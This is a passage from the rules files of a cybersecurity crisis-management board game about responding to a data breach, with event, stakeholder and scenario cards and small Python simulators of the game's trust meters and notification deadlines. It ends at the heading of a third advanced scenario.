Description: The GDPR-style 72-hour clock is running out. Regulators expect notification of the breach (ACTION-10) before the clock expires at end of Turn 8.

Resolution:
- If ACTION-10 (Regulatory Notification) is already completed: Regulator trust +5 (early, cooperative notification)
- If not: Regulator trust -10 now and at the start of each later turn (Turns 6, 7, 8) until ACTION-10 is completed.
- Deferred consequence: if regulators are never notified in-game, -20 Reputation at final scoring (deferred fine — GDPR fines run up to €20M or 4% of global turnover, whichever is HIGHER; narrative-only figure).


EVENT-12: Government Subpoena

Scheduled: Turn 7 (medium/large breaches — skip for small-scope games)
Type: Legal

Description: A subpoena arrives (FBI, state attorney general, or a congressional inquiry): turn over evidence, provide executive testimony, comply with the investigation.

Resolution:
- Budget -5 (legal fees; floor 0)
- Executive trust -10 (executives in the spotlight)
- Investigation +5% (compelled evidence-sharing accelerates fact-finding)

Opportunity: an independent investigation can validate a good-faith response; law enforcement may help recover evidence.


Triggered Events

EVENT-05: Customer Class Action Lawsuit

Trigger: ACTION-09 not completed by end of Turn 5, OR Customer trust below 20% at the start of any turn.
Type: Legal

Description: A law firm recruits customers and files a class action: "Jane Doe et al. vs. [Company Name]" — failure to protect data, failure to notify in a timely way, damages plus attorney fees.

Effects:
- Customer trust -15
- Board trust -10
- -10 Reputation at final scoring

Team Response: Cannot be undone — only mitigated by rebuilding trust for the rest of the game.


EVENT-06: Regulatory Fine

Trigger: Regulator trust below 20% at the start of any turn. (If regulators are never notified in-game, the deferred -20 Reputation from EVENT-02 applies at scoring instead — do not double-apply.)
Type: Regulatory

Description: A regulator announces a penalty for inadequate security and delayed cooperation.

Effects:
- Budget -10 (≈ $500K; floor 0)
- Board trust -10
- -10 Reputation at final scoring

Real-world scale (narrative-only): turnover-based regimes drive the largest penalties — GDPR fines can reach €20M or 4% of global turnover, whichever is HIGHER.


EVENT-07: Media Frenzy

Trigger: Media trust below 20% at the start of any turn, OR no Communication-category action completed by end of Turn 3.
Type: Communication

Description: Major outlets pick up the story: national coverage, "Massive Data Breach" headlines, social media amplification.

Effects:
- Media trust -20
- Customer trust -15
- Board trust -10

Team Response: ACTION-11 (Media Management) plus visible, transparent leadership.


EVENT-08: Second Breach Discovered

Trigger: At the start of Turn 6, Remediation is below 30% AND ACTION-07 (Rebuild) has not been completed.
Type: Escalation — once per game

Description: While responding to the first breach, investigators discover another compromised data store — the attacker maintained hidden persistence.

Effects:
- The game extends by +2 turns (once per game): play now runs to Turn 10. Scoring deadlines do NOT move — the regulatory deadline remains end of Turn 8.
- Investigation -30% (new breach invalidates part of your picture)
- Customer trust -20, Regulator trust -15, Media trust -10, Board trust -15
- Board releases +10 emergency Budget
- -10 Reputation at final scoring

Prevention: ACTION-07 (Rebuild), ACTION-04 (Third-Party IR), or strong Remediation progress by Turn 6.


EVENT-10: Competitor Advantage

Trigger: Customer trust below 40% at the start of Turn 5 or any later turn.
Type: Business

Description: A competitor launches a "Trust us with your data" campaign aimed at your customers.

Effects:
- Customer trust -10
- Budget -5 (lost revenue; floor 0)

Team Response: Customer communication and visible security improvements; trust can rebuild over the remaining turns.


EVENT-11: Key Executive Resignation

Trigger: Executive trust below 30% at the start of any turn.
Type: Internal

Description: A key executive (CISO, CTO, General Counsel, or CFO) resigns mid-crisis, citing "personal reasons" — really: "I don't trust this response."

Effects:
- Executive trust -10
- Board trust -10
- While Executive trust remains below 30%, the Justification bonus (optional +5% d20) is unavailable — leadership vacuum

Prevention: Regular internal communication, visible progress, board support.


Event Deck Summary (v2.2)

| Event | Kind | Turn / Trigger | Core Effect |
|---|---|---|---|
| EVENT-01 First Media Coverage | Scheduled | Turn 2 | Media +5 if ACTION-11 done, else -10 |
| EVENT-04 Board Meeting | Scheduled | Turn 3 | Board +10 if ACTION-12 done, else -20 |
| EVENT-03 Customer Notification Window | Scheduled | Turn 5 | -10 Customer/turn if ACTION-09 late; never = -15 Rep |
| EVENT-09 Shareholder Pressure | Scheduled | Turn 5 (public co.) | Board -5 (prepared) or -15 |
| EVENT-02 Regulatory 72h Deadline | Scheduled | Turn 6 (deadline Turn 8) | -10 Regulator/turn while un-notified; never = -20 Rep |
| EVENT-12 Government Subpoena | Scheduled | Turn 7 (med/large) | Budget -5, Exec -10, Investigation +5% |
| EVENT-05 Class Action | Triggered | Customers un-notified after T5 or trust <20% | Cust -15, Board -10, -10 Rep |
| EVENT-06 Regulatory Fine | Triggered | Regulator trust <20% | Budget -10, Board -10, -10 Rep |
| EVENT-07 Media Frenzy | Triggered | Media <20% or silent through T3 | Media -20, Cust -15, Board -10 |
| EVENT-08 Second Breach | Triggered | T6: Remediation <30%, no rebuild | +2 turns (once), Inv -30%, trust hits, -10 Rep |
| EVENT-10 Competitor Advantage | Triggered | Customer trust <40% from T5 | Cust -10, Budget -5 |
| EVENT-11 Executive Resignation | Triggered | Executive trust <30% | Exec -10, Board -10, no Justification bonus |

Deadline Summary (v2.2 — the only clock)

| Deadline | Turn | If missed |
|---|---|---|
| Internal legal/executive escalation | End of Turn 2 | Narrative only (relabeled from the old "12-hour regulatory deadline" — the regulatory anchor is GDPR 72h) |
| Customer notification (ACTION-09) recommended | End of Turn 5 | Customer trust -10/turn; EVENT-05 may trigger; never notified = -15 Reputation at scoring |
| Ransom decision (ACTION-13) | Start of Turn 5 (default; +2 turns if NEGOTIATE) | Treated as REFUSE; data-publication event fires |
| Regulatory notification (ACTION-10) | End of Turn 8 (escalating from Turn 6) | Regulator trust -10/turn from Turn 6; never notified = -20 Reputation at scoring |

Former "30-day"/"60-day" deadlines from v2.1 are re-expressed as the deferred final-scoring consequences above — they no longer exist as separate timers.
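To show how the Event Deck Procedure and the deadline rules above interact over an 8-turn game, here is a small simulator written for this edition (it is an added example, not part of the game files or the studio's own tooling). It encodes only the notification clock: EVENT-02, EVENT-03, the triggered EVENT-05 and EVENT-06, trust clamping to 0-100%, the Budget floor of 0, the deferred final-scoring penalties, and the single loss condition (any meter at 0%). The other events, the Holding Statement and the STAKE-01 decay rule are deliberately left out; the trust gains per Communication card are the direct values listed on the Stakeholder Cards; the handling of "do not double-apply" (the EVENT-06 fine's -10 Reputation is replaced by the deferred -20 when regulators are never notified) is this example's reading of the card text.

```python
"""Added example (not the game's own code): simulator for the v2.2 notification clock.

Scheduled events resolve at the start of their turn, triggered events fire once
when their condition holds, trust clamps to 0-100, Budget floors at 0, and any
meter at 0 is an immediate loss.  Only EVENT-02/03/05/06 are modelled.
"""
from dataclasses import dataclass, field

GAME_TURNS = 8

# Communication cards: cost and the direct trust gain printed on the Stakeholder Cards.
ACTION_CARDS = {
    "ACTION-09": (10, "Customer", 15),
    "ACTION-10": (8, "Regulator", 20),
    "ACTION-11": (12, "Media", 20),
    "ACTION-12": (9, "Board", 20),
}


@dataclass
class State:
    turn: int = 0
    budget: int = 50
    trust: dict = field(default_factory=lambda: {
        "Customer": 50, "Regulator": 60, "Media": 40, "Board": 70, "Executive": 80})
    completed: set = field(default_factory=set)  # cards played, e.g. {"ACTION-09"}
    fired: set = field(default_factory=set)      # events already resolved (once per game)
    reputation: int = 0                           # deferred final-scoring modifier
    lost: bool = False
    log: list = field(default_factory=list)

    def adjust(self, meter, delta):
        """Trust changes clamp to 0-100%."""
        self.trust[meter] = max(0, min(100, self.trust[meter] + delta))

    def spend(self, amount):
        """Budget can never go below 0."""
        self.budget = max(0, self.budget - amount)

    def collapsed(self):
        return any(v == 0 for v in self.trust.values())


def start_of_turn(s):
    t = s.turn
    # Step 1: scheduled events and the ongoing penalties they start.
    if t >= 5 and "ACTION-09" not in s.completed:      # EVENT-03 from Turn 5 on
        s.adjust("Customer", -10)
        s.log.append(f"T{t}: EVENT-03 customers un-notified, Customer -10")
    if t == 6 and "ACTION-10" in s.completed:          # EVENT-02: early notification
        s.adjust("Regulator", 5)
    if t >= 6 and "ACTION-10" not in s.completed:      # EVENT-02 escalation T6-T8
        s.adjust("Regulator", -10)
        s.log.append(f"T{t}: EVENT-02 regulators un-notified, Regulator -10")
    # Step 2: triggered events, each firing once per game.
    if "EVENT-05" not in s.fired and (
            (t > 5 and "ACTION-09" not in s.completed) or s.trust["Customer"] < 20):
        s.fired.add("EVENT-05")
        s.adjust("Customer", -15); s.adjust("Board", -10); s.reputation -= 10
        s.log.append(f"T{t}: EVENT-05 class action filed")
    if "EVENT-06" not in s.fired and s.trust["Regulator"] < 20:
        s.fired.add("EVENT-06")
        s.spend(10); s.adjust("Board", -10); s.reputation -= 10
        s.log.append(f"T{t}: EVENT-06 regulatory fine")
    if s.collapsed():
        s.lost = True


def play(s, card):
    cost, meter, gain = ACTION_CARDS[card]
    if s.budget < cost:  # unaffordable: only the free Holding Statement would remain
        raise ValueError(f"cannot afford {card} on turn {s.turn}")
    s.spend(cost)
    s.completed.add(card)
    s.adjust(meter, gain)


def final_scoring(s):
    """Deferred consequences, applied only if the company survived to the end."""
    if "ACTION-09" not in s.completed:
        s.reputation -= 15
    if "ACTION-10" not in s.completed:
        s.reputation -= 20
        if "EVENT-06" in s.fired:
            s.reputation += 10  # assumed reading of "do not double-apply": fine's -10 replaced


def run(plan, turns=GAME_TURNS):
    """plan maps a turn number to the one Communication card completed on that turn."""
    s = State()
    for t in range(1, turns + 1):
        s.turn = t
        start_of_turn(s)
        if s.lost:
            return s
        if t in plan:
            play(s, plan[t])
            if s.collapsed():
                s.lost = True
                return s
    final_scoring(s)
    return s


if __name__ == "__main__":
    for name, plan in [("silent", {}), ("customers only", {4: "ACTION-09"}),
                       ("both notices", {2: "ACTION-10", 4: "ACTION-09"})]:
        s = run(plan)
        print(f"{name}: lost={s.lost} trust={s.trust} rep={s.reputation} budget={s.budget}")
```

Running the three constructed plans shows the shape of the clock: a team that never communicates loses at the start of Turn 8 (EVENT-03's recurring -10 drives Customer trust to 0 after EVENT-05 has already fired at Turn 6), a team that notifies customers on Turn 4 but never regulators ends with Regulator trust at 30% and the deferred -20 Reputation, and a team that notifies both survives with no scoring penalty.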


Turn Sequence with Events (reference)

Standard 8-Turn Disaster Recovery Game:

| Turn | Scheduled Event | Typical Focus |
|---|---|---|
| 1 | | Investigate, contain |
| 2 | First Media Coverage | Investigation, media prep |
| 3 | Board Meeting | Board briefed, regulators notified early |
| 4 | | Remediation |
| 5 | Customer Notification Window + Shareholder Pressure | Customer notification, ransom decision |
| 6 | Regulatory 72h Deadline (escalation begins) | Regulators notified (if not already), remediation |
| 7 | Government Subpoena | Final remediation, communication |
| 8 | — (game ends at +72h) | Wrap-up actions, final scoring |

Gameplay Strategy

Early Game (Turns 1-3)

Mid Game (Turns 4-6)

Late Game (Turns 7-8)


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by event kind:
     - Blue (Scheduled): EVENT-01, EVENT-02, EVENT-03, EVENT-04, EVENT-09, EVENT-12
     - Orange (Triggered): EVENT-05, EVENT-06, EVENT-07, EVENT-08, EVENT-10, EVENT-11
  3. Print the scheduled turn (or trigger condition) prominently on each card
  4. Include consequences clearly
  5. Cut along dotted lines
  6. Event timeline mat: see print pack (coming)

Disaster Recovery Module: Event Timeline Cards · Part of Incident Zero, a modular cybersecurity board game · v2.2 - Playtest Edition

cards/disaster-recovery/core-deck/stakeholder-cards.md

Disaster Recovery Module: Stakeholder Cards

Version: 2.2 - Playtest Edition
Last Updated: October 2025


Overview

Stakeholder Cards represent the key groups affected by a data breach. Each stakeholder has a trust/satisfaction level (0-100%) that changes based on team actions. Stakeholders can escalate if not managed (triggering Events and budget costs).

Trust Thresholds & Loss (v2.2 — the ONE authoritative rule)

All older thresholds ("<30% trust = loss", "keep above 30/40/50 to win") are removed in v2.2.


Stakeholder Cards

STAKE-01: Customers

Stakeholder Type: External
Primary Concern: Data privacy and service availability
Trust Meter: Starts at 50%
Decay (v2.2): From Turn 3 onward, if the team has completed no Communication-category action (the free Holding Statement counts), Customer trust -10 at the start of each turn. This does not stack with the Turn-5 notification penalty (EVENT-03) — apply one, not both, per turn. Below 20% = CRITICAL warning state (may trigger EVENT-05).

Description: The customers whose data was breached. They want to know:
- What data was accessed
- Whether it was encrypted
- What they should do (change password, watch credit)
- Whether the company is protecting them
- Whether to switch providers

Behavior:
- High Trust (70%+): Continue using service, minor PR impact
- Medium Trust (40-70%): Some customer loss, but company is "handling it"
- Low Trust (<40%): Customer exodus, lawsuits, regulatory investigation
- Critical (<20%): Mass churn, bankruptcy risk, acquisition/collapse

What Affects Trust:
- Increases Trust:
  - Customer Notification (ACTION-09): +15%
  - Public statement about patch/fix: +5%
  - Free credit monitoring offer: +10%
  - Quick response time: +5% per turn if investigating

Goal:
- Ideally maintain above 50% for a positive outcome (trust feeds the final Reputation computation)

Loss (v2.2 single rule):
- Customer trust at 0% = company collapses (immediate loss)
- Narrative: mass churn, lawsuits, bankruptcy/acquisition

Crisis Actions That Help:
- ACTION-09 (Customer Notification): +15% trust
- ACTION-11 (Media Management): +10% trust
- Any remediation action that shows progress: +2-5%

Special Events:
- If trust drops too low, class action lawsuit filed (see Event Cards)
- If trust stays high, customer retention and recovery possible
- Media coverage affects customer trust (see Stakeholder: Media)


STAKE-02: Regulators

Stakeholder Type: Government/Legal
Primary Concern: Compliance with breach notification laws
Trust Meter: Starts at 60%
Escalation (v2.2): If ACTION-10 is not completed, Regulator trust -10 at the start of each turn from Turn 6 (see EVENT-02). Below 20% = CRITICAL warning state (triggers EVENT-06 Regulatory Fine).

Description: Government agencies that regulate data privacy:
- State attorneys general (breach notification laws)
- Federal regulators (healthcare, financial, etc.)
- International regulators (GDPR if any EU customers)
- Law enforcement (FBI, Secret Service)

Behavior:
- High Confidence (70%+): Voluntary cooperation, no penalties
- Medium Confidence (40-70%): Investigation, possible fines
- Low Confidence (<40%): Aggressive investigation, significant fines
- Critical (<20%): Criminal prosecution, company shut down

What Affects Regulatory Confidence:
- Increases Confidence:
  - Regulatory Notification (ACTION-10): +20%
  - Prompt customer notification: +10%
  - Third-party incident response (ACTION-04): +15%
  - Forensics evidence: +10%
  - Proactive remediation: +5%

Regulatory Requirements Vary (real-world flavor; the in-game clock is GDPR 72h = end of Turn 8):
- GDPR (EU): Notify supervisory authority within 72 hours; fines up to €20M or 4% of global turnover, whichever is HIGHER
- California: Notify without unreasonable delay; CCPA statutory damages fuel class actions
- HIPAA: Notification within 60 days (healthcare)
- Sector-Specific: Finance, healthcare have stricter rules

Goal:
- Maintain regulatory confidence above 50%
- Comply with the Turn-8 notification requirement

Loss (v2.2 single rule):
- Regulator trust at 0% = company collapses (immediate loss)
- Narrative: crippling fines, criminal prosecution, license revoked

Crisis Actions That Help:
- ACTION-10 (Regulatory Notification): +20% confidence
- ACTION-04 (Third-party IR): +15% confidence
- ACTION-05, ACTION-07 (Remediation): +5-10%

Special Events:
- If notification deadline missed: Regulatory Penalty Event
- If confidence drops too low: Fine Assessment Event
- If properly handled: Regulatory Cooperation Event (reduced penalties)


STAKE-03: Media / Public

Stakeholder Type: External / Communication
Primary Concern: Newsworthy story (bigger = bigger problem)
Trust Meter: Starts at 40% (media is naturally skeptical)
Escalation: Escalates based on company response quality

Description: Media outlets, journalists, bloggers, social media. Media decides whether breach is:
- Small tech story (1 article)
- Major business news (multiple outlets, days)
- National news (major outlets, weeks)
- International scandal (global coverage)

Behavior:
- Positive Coverage (70%+): "Company handled breach well", trust maintained
- Neutral Coverage (40-70%): Matter-of-fact reporting, some concern
- Negative Coverage (<40%): "Company slow to respond", "Cover-up suspected"
- Scandal (<20%): Major negative coverage, "Company failed customers"

What Affects Media Coverage:
- Positive Factors:
  - Proactive media statement (ACTION-11): +20%
  - Quick notification (customers notified by end of Turn 5): +15%
  - CEO takes responsibility: +10%
  - Transparent communication: +10%
  - Third-party validation: +5%

Media Impact on Business:
- Positive media → customers stay, suppliers trust company
- Negative media → customers leave, stock price drops, suppliers question
- Scandal media → business collapse possible, bankruptcy risk

Goal:
- Maintain media trust above 40%
- Frame narrative as "company handled responsibly"
- Minimize negative coverage (below 20% = CRITICAL warning; triggers EVENT-07)

Loss (v2.2 single rule):
- Media trust at 0% = company collapses (immediate loss)
- Narrative: negligence narrative sticks, stock crash, consumer boycott

Crisis Actions That Help:
- ACTION-11 (Media Management): +20% coverage
- ACTION-09 (Customer Notification): +5% (transparency)
- ACTION-12 (Board Communication): +5% (if credible)

Special Events:
- If company is silent: "Media Frenzy" Event (increased coverage)
- If company responds well: "Positive Coverage" Event (mitigates damage)
- If executives hide: "Cover-up Narrative" Event (major damage)


STAKE-04: Board of Directors

Stakeholder Type: Internal / Governance
Primary Concern: Company liability and fiduciary duty
Trust Meter: Starts at 70% (board is inherently supportive initially)
Escalation: Drops if response is inadequate; may fire CEO

Description: Board of directors (and C-level executives if private company). Board must:
- Fulfill fiduciary duty to shareholders
- Authorize major spending (crisis response can be very expensive)
- Decide on disclosure (SEC rules if public)
- Decide on executives' future (fire/retain CEO)
- Manage shareholder relationships

Behavior:
- High Confidence (70%+): Board is supportive, authorizes spending, defends executives
- Medium Confidence (40-70%): Board is questioning, scrutinizes spending, considers changes
- Low Confidence (<40%): Board is critical, may fire CEO, considers restructuring
- Critical (<20%): Board votes to remove management, sell company, or file bankruptcy

What Affects Board Confidence:
- Increases Confidence:
  - Board Notification (ACTION-12): +20%
  - Professional incident response: +15%
  - Quick containment: +10%
  - Good regulatory relationship: +10%
  - Transparent communication: +5%

Board Decision Points (v2.2 clock):
- Turn 3: Board Meeting (EVENT-04; ACTION-12 should be done before it)
  - Board decides if CEO retains confidence
  - Major spending approvals (forensics, lawyers, PR)
  - Disclosure decisions

Goal:
- Maintain board confidence above 50%
- Board authorizes necessary spending
- Executives retain their positions (below 20% = CRITICAL warning state)

Loss (v2.2 single rule):
- Board trust at 0% = company collapses (immediate loss)
- Narrative: CEO fired, forced sale, bankruptcy filing

Crisis Actions That Help:
- ACTION-12 (Board Notification): +20% confidence
- ACTION-04 (Third-party IR): +15% (shows professional response)
- ACTION-01, ACTION-07 (Forensics/Rebuild): +5-10%

Special Events:
- Turn 3: Board Meeting Event (first assessment)
- If confidence drops low: "CEO Removed" Event (new CEO, game becomes harder)
- If well-managed: "Board Confidence Maintained" Event (positive modifier)


STAKE-05: Executive Leadership

Stakeholder Type: Internal / Management
Primary Concern: Job security and company survival
Trust Meter: Starts at 80% (executives are naturally supportive initially)
Escalation: Drops if response is chaotic; may resign or sabotage

Description: C-level executives (CEO, CTO, CFO, CISO, General Counsel) who must:
- Make critical decisions under pressure
- Coordinate crisis response
- Handle media inquiries
- Present to board
- Ensure company continues operating
- Manage their own careers/reputations

Behavior:
- High Morale (70%+): Executives are focused, coordinated, decisive
- Medium Morale (40-70%): Executives are stressed, some disagreements, slower decisions
- Low Morale (<40%): Executives may resign, infighting, poor decisions
- Critical (<20%): Executive exodus, chaos, no leadership

What Affects Executive Morale:
- Increases Morale:
  - Clear incident response plan: +15%
  - Professional guidance (consultants): +10%
  - Regular communication/updates: +5% per turn
  - Board support: +10%
  - Progress on containment: +5%

Executive Departures Risk:
- If morale drops too low, key executives resign
- Each resignation removes their expertise from future decisions
- Replacement executives are less effective initially
- Crisis becomes harder to manage

Goal:
- Maintain executive morale above 50%
- Prevent key executive resignations (below 30% triggers EVENT-11; below 20% = CRITICAL warning state)
- While Executive trust is below 30%, the Justification bonus is unavailable (see EVENT-11)

Loss (v2.2 single rule):
- Executive trust at 0% = company collapses (immediate loss)
- Narrative: executive exodus, leadership vacuum, chaos

Crisis Actions That Help:
- Regular communication: +5% per turn
- Professional response team: +10%
- Regulatory/customer progress: +5%
- Board confidence: +10%

Special Events:
- If morale drops low: "Executive Resignation" Event (key person leaves)
- If morale stays high: "Leadership United" Event (positive coordination bonus)
- Media attacks on executives: Morale drop (-10%)


Stakeholder Summary

| Stakeholder | Type | Start Trust | Critical Warning | Primary Actions |
|---|---|---|---|---|
| Customers | External | 50% | <20% | ACTION-09 (notify), ACTION-11 (PR) |
| Regulators | Government | 60% | <20% | ACTION-10 (notify), ACTION-01/04 (forensics) |
| Media | External | 40% | <20% | ACTION-11 (PR), ACTION-09 (transparency) |
| Board | Internal | 70% | <20% | ACTION-12 (notify), ACTION-04 (guidance) |
| Executives | Internal | 80% | <20% (resignations from <30%) | Regular communication, success indicators |

Reminder (v2.2): critical is a warning state only. The single loss condition is any trust meter at 0%. Meters clamp to 0-100%.
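The summary table and the v2.2 reminder above can be written down as a small trust tracker, useful as a facilitator aid when several meters move in one turn. This is an added example, not code from the Incident Zero print pack: the starting values, thresholds and card deltas (ACTION-12 +20, ACTION-04 +15, media attack on executives -10) are the ones on these cards, while the deltas marked "constructed" are made up for the walk-through.

```python
"""Stakeholder trust tracker for the v2.2 Disaster Recovery rules.

Added illustration, not part of the Incident Zero print pack. It encodes
the Stakeholder Summary: starting trust per stakeholder, 0-100% clamping,
the CRITICAL warning state below 20%, the Executives resignation trigger
(EVENT-11, below 30%, which also removes the Justification bonus) and the
single loss condition (any meter at 0%). Deltas marked "constructed" are
made up for the walk-through; the others are printed on the cards.
"""
from dataclasses import dataclass, field

START_TRUST = {
    "Customers": 50,
    "Regulators": 60,
    "Media": 40,
    "Board": 70,
    "Executives": 80,
}
CRITICAL_BELOW = 20     # warning state only; never a loss by itself (v2.2)
RESIGNATION_BELOW = 30  # Executives only: EVENT-11 fires, Justification bonus off


def clamp(value: int) -> int:
    """Meters clamp to 0-100% (v2.2)."""
    return max(0, min(100, value))


@dataclass
class StakeholderBoard:
    trust: dict = field(default_factory=lambda: dict(START_TRUST))
    log: list = field(default_factory=list)

    def apply(self, stakeholder: str, delta: int, reason: str) -> int:
        """Apply a trust change and record it; returns the clamped value."""
        before = self.trust[stakeholder]
        after = clamp(before + delta)
        self.trust[stakeholder] = after
        self.log.append((stakeholder, reason, before, after))
        return after

    def warnings(self) -> list:
        """Stakeholders in the CRITICAL warning state (<20%)."""
        return sorted(s for s, v in self.trust.items() if v < CRITICAL_BELOW)

    def triggered_events(self) -> list:
        """Triggered Events owed by the current meters (only EVENT-11 is modelled)."""
        return ["EVENT-11"] if self.trust["Executives"] < RESIGNATION_BELOW else []

    def justification_bonus_available(self) -> bool:
        """Unavailable while Executive trust is below 30% (see EVENT-11)."""
        return self.trust["Executives"] >= RESIGNATION_BELOW

    def collapsed(self) -> list:
        """The single v2.2 loss condition: any meter at 0% ends the game."""
        return sorted(s for s, v in self.trust.items() if v == 0)

    def status(self) -> str:
        """LOSS beats CRITICAL beats OK; CRITICAL is only a warning."""
        if self.collapsed():
            return "LOSS"
        if self.warnings():
            return "CRITICAL"
        return "OK"


def sample_turns() -> StakeholderBoard:
    """Constructed walk-through showing clamping, EVENT-11 and a collapse."""
    board = StakeholderBoard()
    board.apply("Board", +20, "ACTION-12 Board Notification")            # 70 -> 90
    board.apply("Board", +15, "ACTION-04 Third-party IR")                # 105 clamps to 100
    board.apply("Executives", -10, "Media attacks on executives")        # 80 -> 70
    board.apply("Executives", -45, "constructed: chaotic response")      # 70 -> 25: EVENT-11
    board.apply("Media", -45, "constructed: 'company hid breach' story")  # 40 -> 0: loss
    return board


if __name__ == "__main__":
    b = sample_turns()
    for entry in b.log:
        print("%-10s %-40s %3d%% -> %3d%%" % entry)
    print("status:", b.status(), "warnings:", b.warnings(), "events:", b.triggered_events())
```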


Gameplay Strategy

Multi-Stakeholder Management

Teams must balance managing five competing stakeholder groups:

Prioritization Strategy 1: External First - Focus on Customers and Media - Maintain public trust - Regulators will follow - Risk: Internal management gets neglected

Prioritization Strategy 2: Internal First - Focus on Board and Executives - Maintain leadership confidence - Internal team makes better decisions - Risk: External stakeholders (customers, media) get neglected

Prioritization Strategy 3: Balanced - Do some actions for each stakeholder group - Distribute budget across all notifications - More complex but sustainable - Risk: Medium progress on all, complete on none

Prioritization Strategy 4: Targeted - Identify critical stakeholder (maybe regulators) - Focus budget there - Neglect others - Risk: Single stakeholder collapse

Stakeholder Interactions

Stakeholders influence each other: - Media → Customers: If media says "company hid breach", customers distrust (stack penalties) - Regulators → Customers: If regulator fines company, customers see company as unsafe - Board → Executives: If board removes CEO, executives lose confidence - Executives → Board: If executives resign, board loses confidence in response - Customers → Stock Price: If customer trust drops, stock price drops (affects Board decisions)


Escalation Mechanics

Each stakeholder's escalation matches a Triggered Event (see Event Cards — those are the authoritative conditions):

Customers Escalate If:

Regulators Escalate If:

Media Escalates If:

Board Escalates If:

Executives Escalate If:


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by stakeholder type:
     - Blue (External): STAKE-01 (Customers), STAKE-03 (Media)
     - Red (Internal): STAKE-04 (Board), STAKE-05 (Executives)
     - Purple (Government): STAKE-02 (Regulators)
  3. Include trust meter on each card (0-100% indicator)
  4. Include escalation triggers
  5. Cut along dotted lines
  6. Stakeholder tracker sheet: see print pack (coming)

Disaster Recovery Module: Stakeholder Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/disaster-recovery/expansion-deck/advanced-scenarios.md

Disaster Recovery Module: Advanced Crisis Scenarios (Expansion)

Version: 2.2 - Playtest Edition
Last Updated: October 2025


Overview

Advanced Scenario Cards extend the Disaster Recovery module with sophisticated, multi-faceted crisis situations that challenge experienced crisis management teams.

How scenarios work (v2.2): each scenario is played with the standard core rules — same 8-turn clock, same Action/Event/Stakeholder cards, same scoring. A scenario adds its "Special Events" as extra Scheduled events on the timeline at setup, and applies its concrete Difficulty (v2.2) effects (listed per scenario, replacing the old percentage "difficulty multipliers"). The only mechanical layers are the Special Events and the Difficulty block; "Cost Implications" sections are narrative color for the debrief. Dollar figures are narrative-only unless converted at 1 Budget ≈ $50K.


Advanced Crisis Scenarios

SCENARIO-01: Multi-Region Breach with Data Sovereignty Issues

Complexity: ADVANCED
Affected Regions: US + EU + Asia
Primary Challenge: Different legal requirements for different regions

Description: Breach affects customer data in multiple countries with different privacy laws: - US (California): notify without unreasonable delay; CCPA statutory damages fuel class actions - EU (GDPR): 72-hour notification deadline; fines up to €20M or 4% of global turnover, whichever is HIGHER - Asia (varies): Different deadlines and requirements in each country

Data residency requirements mean: - EU customer data cannot be transferred to US servers - Forensics must happen in country where data is stored - Different regulators in each country demand investigation - Different notification laws require different messages

Key Complications: - Timeline Conflict: EU regulators demand notification faster than the domestic clock; US requires notification without unreasonable delay; Asia varies - Legal Conflict: EU GDPR vs. US lawful intercept (conflicting requirements) - Investigation: Must conduct forensics in multiple jurisdictions simultaneously - Costs: Multi-region response = much higher costs

Team Decision Points: 1. Which region to prioritize (cannot satisfy all simultaneously) 2. How to conduct forensics across jurisdictions 3. How to notify customers differently per region 4. How to handle conflicting regulatory requirements

Special Events (added to the timeline at setup): - Turn 2: EU regulators demand notification — a second ACTION-10 play (EU filing) is due by end of Turn 4 - Turn 5: International regulators demand investigation coordination (Regulator trust -5 if Investigation is below 25%) - Turn 6: Data residency complication — if the EU filing was missed, Regulator trust -10 per turn (in place of, not stacked with, the core EVENT-02 escalation)

Cost Implications: - Multi-region legal and forensics overhead: see Difficulty below - Regulatory fines can stack across jurisdictions (narrative-only) - Notification costs: translations, different templates, regulatory filings

Team Response: - Must prioritize regions (satisfy EU first due to timeline) - Must engage local lawyers in each jurisdiction - Must conduct compliant investigation (following local laws) - Communication % must advance faster than usual

Difficulty (v2.2): - All Communication advances -5% (multi-jurisdiction overhead; minimum +5%) - A second regulator notification (EU) is required by end of Turn 4 (ACTION-10 played twice this game) - Set aside 5 Budget at setup as a translation/filing reserve (unavailable for actions)


SCENARIO-02: Ransomware with Extortion Threat

Complexity: ADVANCED
Attacker Demand: $10M ransom or threaten to sell/publish data
Primary Challenge: Responding to extortion threats

Description: Attacker not only encrypted data but also stole data and threatens public disclosure: - "Pay up or we publish 50GB of customer PII on dark web" (demand ≈ 20 Budget; narrative "$10M" for a large enterprise) - Attacker provides proof of data access (sample files) - Extortion email sent to CEO and board - Attacker sets the deadline at the start of Turn 5 (the core ACTION-13 ransom deadline)

Key Complications:
- Payment Question: Pay ransom or not?
  - Paying: Funding criminal enterprise, no guarantee of data deletion
  - Not paying: Risk of data publication (massive PR disaster)
- Disclosure Dilemma: Tell customers about extortion threat?
  - Yes: Customers fear data will be published
  - No: If data is published, looks like cover-up
- Law Enforcement: FBI recommends not paying (incentivizes more attacks)
- Backup Reliance: Can you recover without paying?

Timeline Pressure (Special Events added at setup): - Turn 1: Extortion email; ransom deadline set at start of Turn 5 - Turn 2: First partial data publication (attacker shows they have data): Media trust -5 - Turn 3: Attacker lowers price (negotiation attempt; pure roleplay — ACTION-13 costs are unchanged) - Turn 5: Deadline reached — resolve ACTION-13 as printed (publish if unpaid; +2 turns if NEGOTIATE)

Financial Dilemma: - Ransom: payment may violate OFAC sanctions if the actor is sanctioned; many insurers restrict or exclude ransom coverage - Recovery from backup: Slow (if backups exist) - Data publication: Regulatory fines + lawsuits (potentially $50M+ liability; narrative-only) - Public disclosure: Stock price crash, customer loss

Team Decisions: 1. Pay ransom? (Risk: Encourages future attacks, no guarantee) 2. Attempt to recover from backup? (Risk: Slow recovery, data loss) 3. Notify customers before/after data publication? (Risk: Either way is bad) 4. Notify regulators? (Required, but shows full extent of damage)

Law Enforcement Engagement: - FBI may take over investigation (federal crime) - Reduces team's control of situation - May recommend decoy ransom negotiation (catch attacker) - Investigation may take weeks (slow response)

Special Events (added to the timeline at setup): - Turn 3: Media discovers extortion threat ("CEO held for ransom"): Media trust -10 - Turn 4: Attacker releases more sample data: Customer trust -5

Cost Implications: - Ransom: 20 Budget if paid (ACTION-13 PAY, as printed) - FBI coordination and extortion-specific notification overhead: see Difficulty below - Regulatory fines if data published: narrative-only (GDPR-scale)

Difficulty (v2.2): - Remediation advances are halved until ACTION-13 is declared (operational paralysis while the decision hangs) - Use ACTION-13 exactly as printed; the ransom deadline is start of Turn 5


SCENARIO-03: Supply Chain Compromise (Vendor Breach Affects Customers)

Complexity: ADVANCED
